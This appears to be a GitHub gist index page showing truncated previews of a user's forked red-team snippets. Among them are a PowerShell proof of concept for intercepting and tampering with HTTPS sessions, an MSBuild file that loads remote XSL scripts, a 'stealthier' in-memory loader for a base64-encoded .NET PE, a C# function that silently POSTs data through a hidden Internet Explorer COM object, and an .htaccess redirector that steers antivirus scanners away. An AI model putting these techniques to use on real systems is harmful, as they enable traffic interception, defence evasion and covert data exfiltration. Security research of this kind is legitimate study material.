ohio813
ohio813
/ InterceptorThing.ps1
Created
January 31, 2018 13:17
Interceptor - Normal User No Admin Required.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
| <Target Name="Example"> | |
| <ItemGroup> | |
| <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
| </ItemGroup> | |
| <PropertyGroup> | |
| <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
| </PropertyGroup> | |
| <XslTransformation | |
| OutputPaths="output.%(XmlFiles.FileName).html" |
ohio813
/ dictionary-sorted.txt
Created
March 9, 2018 17:41
— forked from klauspost/dictionary-sorted.txt
Brotli dictionary - printed escaped
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " </div>" | |
| " })();\r\n" | |
| " && " | |
| " & " | |
| " " | |
| " ''The " | |
| " ("" | |
| " (199" | |
| " (200" | |
| " (e.g." |
ohio813
/ LoadMethodScanner.ps1
Created
August 19, 2018 11:05
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
ohio813
/ LoadInMemoryModule.ps1
Created
August 19, 2018 11:12
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
ohio813
/ TrustedHashes.csv
Created
August 19, 2018 11:16
— forked from mattifestation/TrustedHashes.csv
All catalog hashes extracted from a mounted install.wim from en_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090741.iso
We can't make this file beautiful and searchable because it's too large.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "Algorithm","Hash","CatalogPath","Hint" | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","F5EEEC38876E48617643A9E735A30B9EC3D08D77075CD81F239A15626E3F7DD5","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","4BA33EC224E42FC929BA6487041C2C4275C5BCA66CD89471A09BC7F522A5661F","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","29DC48FD41061B58DE61060BA568C5B5C25328B454E84F5FD5C33310E9A501D8","C:\Windows\InfusedApps\Frameworks\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe |
ohio813
/ ie_com.cs
Created
August 23, 2018 22:59
— forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // sample function that takes in a destination server, POST data, and custom HTTP request headers | |
| private string SendData(string dst, byte[] postData, string customHeaders) | |
| { | |
| Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
| object IE = Activator.CreateInstance(com_type); | |
| object[] falseArr = new object[] { false }; | |
| object[] trueArr = new object[] { true }; | |
| com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
| com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
ohio813
/ .htaccess
Created
August 23, 2018 23:14
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
ohio813
/ CmdlineProcessArgCheck.vbs
Created
August 23, 2018 23:21
— forked from curi0usJack/CmdlineProcessArgCheck.vbs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE | |
| strComputer = "." | |
| strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" | |
| Set objLocator = CreateObject("WbemScripting.SWbemLocator") | |
| Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv") | |
| objReg.EnumKey HKLM, strKey, arrSubKeys | |
| objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled | |
| If IsNull(isenabled) Then |
ohio813
/ exeoutputsearch.ps1
Created
August 23, 2018 23:21
— forked from curi0usJack/exeoutputsearch.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $exepath = "c:\windows" | |
| $searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path") | |
| $skip = @("logoff.exe", "mcrmgr.exe", "audit.exe") | |
| $foundin = @() | |
| $testedbins = @() | |
| Function Execute-Command ($commandPath, $commandArguments) | |
| { | |
| $pinfo = New-Object System.Diagnostics.ProcessStartInfo | |
| $pinfo.FileName = $commandPath |